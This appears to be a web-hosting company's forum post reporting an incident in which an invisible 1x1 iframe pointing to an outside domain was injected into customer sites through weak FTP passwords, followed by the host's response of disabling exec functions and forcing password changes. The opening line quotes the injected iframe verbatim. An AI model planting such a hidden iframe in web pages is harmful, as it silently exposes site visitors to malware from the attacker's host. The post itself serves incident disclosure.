Code:
< iframe src='http://huyamilka.com/strong/092/' width=1 height=1>< /iframe >
this was injected in accounts with weak passwords. I was surprised to see all their data as they had FTP passwords for main accounts which could have been used to access cpanel as well.
We have managed to find the exact thing which was used as the datacenter hosting huyamilka.com gave all their data to us to verify. also the kid whose server was used gave all data to us and as per that we have disabled ftp_exec function on our server. so now we have all types of exec functions disabled on server which will make some inconvenience to our customers but this is the high time to switch to secure applications and secure code. anything done in php wont work for your
website hosting. it has to exclude all exec functions to work on our servers.
We have reserved 1 server for exec functions which will be used to migrate accounts of customers who will insist for exec functions.
global FTP access will be restored on all servers once all passwords are changed for the accounts which got targeted. we have abnormal load on helpdesk for ftp and register_globals but things will get back to normal in next 2 days.
__________________
UK Web Hosting ||
Business Hosting ||
eUKhost Knowledgebase
Toll Free : 0808 262 0255 ||
MSN : mark @ eukhost.com ||
AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________
Great Opportunity :: Join our
Affiliate Program for
FREE and earn 20% commission on each referral.